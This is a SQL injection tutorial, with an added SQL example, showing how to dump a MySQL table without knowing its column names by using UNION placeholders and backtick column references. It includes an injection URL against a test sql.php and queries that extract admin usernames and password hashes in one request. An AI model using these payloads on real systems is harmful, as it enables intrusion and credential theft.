0x00 Overview
Useful when the column names of a table cannot be obtained, for example when information_schema cannot be queried.
0x01 Test tables
# tdb_goods table, 7 columns in total
mysql> select * from tdb_goods limit 0,1;
+----------+-----------------------+------------+------------+-------------+---------+------------+
| goods_id | goods_name            | goods_cate | brand_name | goods_price | is_show | is_saleoff |
+----------+-----------------------+------------+------------+-------------+---------+------------+
|        1 | R510VC 15.6英寸笔记本 | 笔记本     | 华硕       |    3399.000 |       1 |          0 |
+----------+-----------------------+------------+------------+-------------+---------+------------+
1 row in set
# tdb_admin table, 3 columns in total
mysql> select id,username,password from tdb_admin limit 0,1;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | 7fef6171469e80d32c0559f88b377245 |
+----+----------+----------------------------------+
1 row in set
0x02 Experiment
Suppose only the table name is known, not the column names, but the data still has to be read. What must be known is the number of columns (3 for tdb_admin): MySQL rejects a union whose two sides differ in column count with error 1222, so adding literals one at a time until the union succeeds gives the count. The SQL can then be written as: select 1,2,3 union select * from tdb_admin;
mysql> select 1,2,3 union select * from tdb_admin;
+---+-------+----------------------------------+
| 1 | 2     | 3                                |
+---+-------+----------------------------------+
| 1 | 2     | 3                                |
| 1 | admin | 7fef6171469e80d32c0559f88b377245 |
+---+-------+----------------------------------+
2 rows in set
The id, username and password columns of tdb_admin now appear under the names 1, 2 and 3, so the table's real column names never need to be known.
Next, read the data out. Wrapping the union in a derived table (aliased a below) makes those names addressable as `1`, `2` and `3`; the backticks matter, because without them 1, 2 and 3 are plain literals, not column references:
- id       is addressed as `1`
- username is addressed as `2`
- password is addressed as `3`
# read the id column of tdb_admin
mysql> select `1` from (select 1,2,3 union select * from tdb_admin) a limit 1,1;
+---+
| 1 |
+---+
| 1 |
+---+
1 row in set
# read the username column of tdb_admin
mysql> select `2` from (select 1,2,3 union select * from tdb_admin) a limit 1,1;
+-------+
| 2     |
+-------+
| admin |
+-------+
1 row in set
# read the password column of tdb_admin
mysql> select `3` from (select 1,2,3 union select * from tdb_admin) a limit 1,1;
+----------------------------------+
| 3                                |
+----------------------------------+
| 7fef6171469e80d32c0559f88b377245 |
+----------------------------------+
1 row in set
Note: row 0 of the derived table is the placeholder row (1, 2, 3), so limit 1,1 (skip one row, return one) yields the first real row of tdb_admin; limit 2,1 yields the second, and so on. Because union discards duplicate rows, a real row that happened to equal the placeholder would be dropped; union all keeps it.
0x03 Putting it together
Web request (in a real request the payload is URL-encoded, e.g. spaces as %20 and backticks as %60; the outer union has 7 columns because tdb_goods has 7):
http://www.test.com/sql.php?id=-1 union select 1,2,3,4,5,6,(select concat('~',`1`,'~',`2`,'~',`3`) from (select 1,2,3 union select * from tdb_admin)a limit 1,1)
Resulting database statement (sql.php concatenates id into the query unescaped; goods_id = -1 matches nothing, so the union row is the only row returned):
select * from tdb_goods WHERE goods_id = -1 union select 1,2,3,4,5,6,(select concat('~',`1`,'~',`2`,'~',`3`) from (select 1,2,3 union select * from tdb_admin)a limit 1,1);
The scalar subquery in the last column must return exactly one row, which is what the limit 1,1 guarantees; a bare select 2 from (...) without backticks would return the literal 2 instead of the username.
mysql> select * from tdb_goods WHERE goods_id = -1 union select 1,2,3,4,5,6,(select concat('~',`1`,'~',`2`,'~',`3`) from (select 1,2,3 union select * from tdb_admin)a limit 1,1);
+----------+------------+------------+------------+-------------+---------+-------------------------------------------+
| goods_id | goods_name | goods_cate | brand_name | goods_price | is_show | is_saleoff                                |
+----------+------------+------------+------------+-------------+---------+-------------------------------------------+
|        1 | 2          | 3          | 4          |       5.000 |       6 | ~1~admin~7fef6171469e80d32c0559f88b377245 |
+----------+------------+------------+------------+-------------+---------+-------------------------------------------+
1 row in set
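The whole procedure from 0x02 and 0x03, generalized into reusable MySQL statements, as an added example that is not from the original post. The tdb_admin and tdb_goods tables and their column names are the post's; the column types, the second admin row and its hash are constructed for the example. Beyond the post, it shows how to find the column count without information_schema, why union all is safer than union here, and how to dump every row of the target table in a single request with GROUP_CONCAT instead of one request per row.

```sql
-- Added example (not from the original post). Constructed copies of the post's tables;
-- column types are assumed from the post's output, the second admin row is made up.
CREATE TABLE tdb_admin (id INT, username VARCHAR(32), password CHAR(32));
INSERT INTO tdb_admin VALUES
  (1, 'admin',  '7fef6171469e80d32c0559f88b377245'),
  (2, 'editor', '00000000000000000000000000000000');   -- constructed hash
CREATE TABLE tdb_goods (goods_id INT, goods_name VARCHAR(64), goods_cate VARCHAR(32),
  brand_name VARCHAR(32), goods_price DECIMAL(10,3), is_show TINYINT, is_saleoff TINYINT);

-- Step 1: find the column count of the target table without information_schema.
-- A UNION whose two sides differ in column count fails with
-- ERROR 1222: The used SELECT statements have a different number of columns.
-- Keep adding literals until the statement succeeds.
SELECT 1,2   UNION SELECT * FROM tdb_admin;   -- ERROR 1222
SELECT 1,2,3 UNION SELECT * FROM tdb_admin;   -- succeeds: tdb_admin has 3 columns

-- Step 2: the literals of the first SELECT become the column names of the derived table,
-- so `1`, `2`, `3` address id, username, password by position. UNION ALL (instead of the
-- post's UNION) keeps a real row even if it happens to equal the placeholder row (1,'2','3').
SELECT `1`, `2`, `3`
FROM (SELECT 1,2,3 UNION ALL SELECT * FROM tdb_admin) a
LIMIT 1 OFFSET 1;                             -- first row of tdb_admin; offset 0 is the placeholder

-- Step 3: one request instead of one per row. The WHERE clause drops the placeholder by value
-- rather than by position, so it does not depend on the row order of the union. GROUP_CONCAT
-- output is truncated at group_concat_max_len (default 1024 bytes); for a large table either
-- raise the session variable or page through the rows with LIMIT/OFFSET as in step 2.
SELECT GROUP_CONCAT(CONCAT_WS('~', `1`, `2`, `3`) SEPARATOR '|')
FROM (SELECT 1,2,3 UNION ALL SELECT * FROM tdb_admin) a
WHERE NOT (`1` = 1 AND `2` = '2' AND `3` = '3');
-- 1~admin~7fef6171469e80d32c0559f88b377245|2~editor~00000000000000000000000000000000

-- Step 4: the same dump as the scalar subquery of the injected UNION against the post's
-- 7-column tdb_goods query. GROUP_CONCAT always yields exactly one row, which is what a
-- scalar subquery requires, so no LIMIT is needed here.
SELECT * FROM tdb_goods WHERE goods_id = -1
UNION SELECT 1,2,3,4,5,6,(
  SELECT GROUP_CONCAT(CONCAT_WS('~', `1`, `2`, `3`) SEPARATOR '|')
  FROM (SELECT 1,2,3 UNION ALL SELECT * FROM tdb_admin) a
  WHERE NOT (`1` = 1 AND `2` = '2' AND `3` = '3')
);
```

The value-based filter in step 3 is the one part worth thinking about before reuse: it assumes no real row is exactly (1, '2', '3'). If that cannot be ruled out, fall back to the positional LIMIT/OFFSET form of step 2, which only assumes that UNION ALL returns the placeholder row first, as it does in practice.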